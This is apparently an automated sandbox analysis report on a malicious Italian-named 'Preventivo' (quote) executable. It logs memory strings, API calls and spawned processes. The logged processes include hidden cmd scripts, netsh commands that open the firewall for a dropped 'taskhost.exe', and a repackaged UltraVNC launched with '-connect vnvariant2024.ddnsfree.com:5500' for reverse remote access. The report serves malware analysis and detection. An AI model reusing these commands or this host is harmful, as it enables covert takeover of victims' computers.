Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B305000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 0000002A.00000002.3219628836.000000000070C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr Binary or memory string: , (Hyper-V Tools)
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B305000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 0000002A.00000002.3219628836.000000000070C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr Binary or memory string: , (Hyper-V Server)
Source: viewer.exe, 00000010.00000002.3220368505.0000000001449000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _VMware_
Source: Preventivo24.01.11.exe, Preventivo24.01.11.exe, 00000000.00000002.2033997046.0000000005506000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000002.2033997046.0000000005553000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2031375134.0000000005553000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1988431156.0000000005554000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B305000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 0000002A.00000002.3219628836.000000000070C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr Binary or memory string: Service Pack: 6aService Pack: 1aService Pack:%d.%dService Pack:%dService Pack:0.%d, (Storage Server Enterprise), (Storage Server Express), (Storage Server Standard), (Storage Server Workgroup), (Storage Server Essentials), (Storage Server), (Home Server Premium Edition), (Home Server Edition), (Terminal Services), (Embedded), (Terminal Services in Remote Admin Mode), (64 Bit Edition), (Media Center Edition), (Tablet PC Edition), (Compute Cluster Edition), (Foundation Edition), (MultiPoint Premium Edition), (MultiPoint Edition), (Security Appliance), (BackOffice), (N Edition), (E Edition), (Hyper-V Tools), (Hyper-V Server), (Server Core), (Uniprocessor Free), (Uniprocessor Checked), (Multiprocessor Free), (Multiprocessor Checked), (Windows Essential Business Server Manangement Server), (Windows Essential Business Server Messaging Server), (Windows Essential Business Server Security Server), (Cluster Server), (Small Business Server), (Small Business Server Premium), (Prerelease), (Evaluation), (Automotive), (China), (Single Language), (Win32s), (Education), (Industry), (Student), (Mobile), (IoT Core), (Cloud Host Infrastructure Server), (S Edition), (Cloud Storage Server), (PPI Pro), (Connected Car), (Handheld)Failed in call to GetOSVersion
Source: Preventivo24.01.11.exe, 00000000.00000002.2033997046.000000000552D000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1988431156.0000000005533000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2031375134.000000000552D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWKe%
Source: taskhost.exe, 0000002A.00000002.3221941378.0000000000EEF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00BEF843 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00BEF843
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B56910 CreateFileW,GetLastError,OutputDebugStringW,OutputDebugStringW,SetFilePointer,OutputDebugStringW,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers, 0_2_00B56910
Source: C:\Games\taskhost.exe Code function: 42_2_005A57B0 GetPrivateProfileStringA,WTSGetActiveConsoleSessionId,KiUserCallbackDispatcher,GetCurrentProcessId,ProcessIdToSessionId,CreateToolhelp32Snapshot,Process32First,CloseHandle,Process32Next,ProcessIdToSessionId,Process32Next,CloseHandle,CloseHandle, 42_2_005A57B0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B20CA0 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_00B20CA0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00BEA1CE mov esi, dword ptr fs:[00000030h] 0_2_00BEA1CE
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00C047DA mov eax, dword ptr fs:[00000030h] 0_2_00C047DA
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00C04796 mov eax, dword ptr fs:[00000030h] 0_2_00C04796
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00BF5EA4 mov ecx, dword ptr fs:[00000030h] 0_2_00BF5EA4
Source: C:\Games\viewer.exe Code function: 7_2_0099B9CA mov eax, dword ptr fs:[00000030h] 7_2_0099B9CA
Source: C:\Games\viewer.exe Code function: 7_2_00993C84 mov eax, dword ptr fs:[00000030h] 7_2_00993C84
Source: C:\Games\taskhost.exe Code function: 42_2_006BC838 mov eax, dword ptr fs:[00000030h] 42_2_006BC838
Source: C:\Games\taskhost.exe Code function: 42_2_006AD615 mov ecx, dword ptr fs:[00000030h] 42_2_006AD615
Source: C:\Games\taskhost.exe Code function: 42_2_006BC7F4 mov eax, dword ptr fs:[00000030h] 42_2_006BC7F4
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00BEA23A GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree, 0_2_00BEA23A
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00A22520 __set_se_translator,SetUnhandledExceptionFilter, 0_2_00A22520
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00BEACAE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00BEACAE
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00A25180 __set_se_translator,SetUnhandledExceptionFilter, 0_2_00A25180
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00BEF843 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00BEF843
Source: C:\Games\viewer.exe Code function: 7_2_00989256 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_00989256
Source: C:\Games\viewer.exe Code function: 7_2_00985248 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_00985248
Source: C:\Games\viewer.exe Code function: 7_2_009853DE SetUnhandledExceptionFilter, 7_2_009853DE
Source: C:\Games\viewer.exe Code function: 7_2_009847F5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_009847F5
Source: C:\Games\taskhost.exe Code function: 42_2_0069C87C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 42_2_0069C87C
Source: C:\Games\taskhost.exe Code function: 42_2_00698A67 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 42_2_00698A67
Source: C:\Games\viewer.exe Code function: 7_2_00965210 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,CloseHandle,GetModuleHandleW,GetProcAddress,CloseHandle,Sleep,Sleep,EnumWindows,BringWindowToTop, 7_2_00965210
Source: C:\Games\viewer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\~.pdf
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\c.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Games\viewer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\c.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\cmd.txt"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\once.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\cmmc.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Games\taskhost.exe C:\Games\taskhost.exe -autoreconnect ID:5402254 -connect vnvariant2024.ddnsfree.com:5500 -run
Source: C:\Games\viewer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\once.cmd" "
Source: C:\Games\viewer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Process created: C:\Windows\SysWOW64\msiexec.exe c:\windows\system32\msiexec.exe" /i "c:\users\user\appdata\roaming\photo and fax vn\photo and vn 1.1.2\install\f97891c\main1.msi" ai_setupexepath=c:\users\user\desktop\preventivo24.01.11.exe setupexedir=c:\users\user\desktop\ exe_cmd_line="/exenoupdates /forcecleanup /wintime 1706007874 " ai_euimsi="
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Process created: C:\Windows\SysWOW64\msiexec.exe c:\windows\system32\msiexec.exe" /i "c:\users\user\appdata\roaming\photo and fax vn\photo and vn 1.1.2\install\f97891c\main1.msi" ai_setupexepath=c:\users\user\desktop\preventivo24.01.11.exe setupexedir=c:\users\user\desktop\ exe_cmd_line="/exenoupdates /forcecleanup /wintime 1706007874 " ai_euimsi="
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B19280 GetCurrentProcess,OpenProcessToken,GetLastError,GetTokenInformation,GetLastError,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,GetLastError,FindCloseChangeNotification, 0_2_00B19280
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B305000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 0000002A.00000002.3219628836.000000000070C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr Binary or memory string: Program Manager
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B305000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, taskhost.exe, 0000002A.00000002.3219628836.000000000070C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr Binary or memory string: Shell_TrayWnd
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B305000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 0000002A.00000002.3219628836.000000000070C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr Binary or memory string: Progman
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B305000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 0000002A.00000002.3219628836.000000000070C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr Binary or memory string: UltraVNC.ini -settingshelperShell_TrayWnd%dpasswdUltraVNCpasswd2isWritablePermissions{34F673E0-878F-11D5-B98A-00B0D07B8C7C}
Source: taskhost.exe.0.dr Binary or memory string: Program ManagerProgmanSHELLDLL_DefViewFolderViewSysListView32BlockInputtimerscreenupdatemouseupdateuser1user2quitplaceholder1placeholder2restartvncDesktop::~vncDesktop : ~vncDesktop
Source: C:\Games\viewer.exe Code function: 7_2_00985448 cpuid 7_2_00985448
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: GetLocaleInfoW,GetLocaleInfoW, 0_2_00B4B480
Source: C:\Games\viewer.exe Code function: GetLocaleInfoW, 7_2_0099F04D
Source: C:\Games\viewer.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 7_2_0099F173
Source: C:\Games\viewer.exe Code function: GetLocaleInfoW, 7_2_0099F279
Source: C:\Games\viewer.exe Code function: GetLocaleInfoW, 7_2_009983B3
Source: C:\Games\viewer.exe Code function: GetLocaleInfoEx,___wcsnicmp_ascii, 7_2_0098433F
Source: C:\Games\viewer.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 7_2_0099F348
Source: C:\Games\viewer.exe Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoW, 7_2_0098440A
Source: C:\Games\viewer.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 7_2_0099E9E7
Source: C:\Games\viewer.exe Code function: EnumSystemLocalesW, 7_2_0099EC89
Source: C:\Games\viewer.exe Code function: EnumSystemLocalesW, 7_2_0099ECD4
Source: C:\Games\viewer.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 7_2_0099EDFA
Source: C:\Games\viewer.exe Code function: EnumSystemLocalesW, 7_2_0099ED6F
Source: C:\Games\viewer.exe Code function: EnumSystemLocalesW, 7_2_00997E3A
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Games\taskhost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Games\taskhost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B63AD0 CreateNamedPipeW,CreateFileW, 0_2_00B63AD0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B56820 GetLocalTime, 0_2_00B56820
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B62440 GetUserNameW,GetLastError,GetUserNameW,GetEnvironmentVariableW,GetEnvironmentVariableW,RegDeleteValueW,RegCloseKey,RegQueryInfoKeyW,RegCloseKey,RegCloseKey,RegDeleteKeyW,RegCloseKey,RegDeleteValueW,RegCloseKey, 0_2_00B62440
Source: C:\Games\viewer.exe Code function: 7_2_009987C3 _free,_free,_free,GetTimeZoneInformation,_free, 7_2_009987C3
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_009E7AA0 GetVersionExW,GetVersionExW,IsProcessorFeaturePresent, 0_2_009E7AA0

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL

Remote Access Functionality

Source: taskhost.exe, 0000002A.00000002.3221941378.0000000000EEF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: RFB 003.008
Source: taskhost.exe, 0000002A.00000002.3223498876.000000000361D000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: RFB 003.008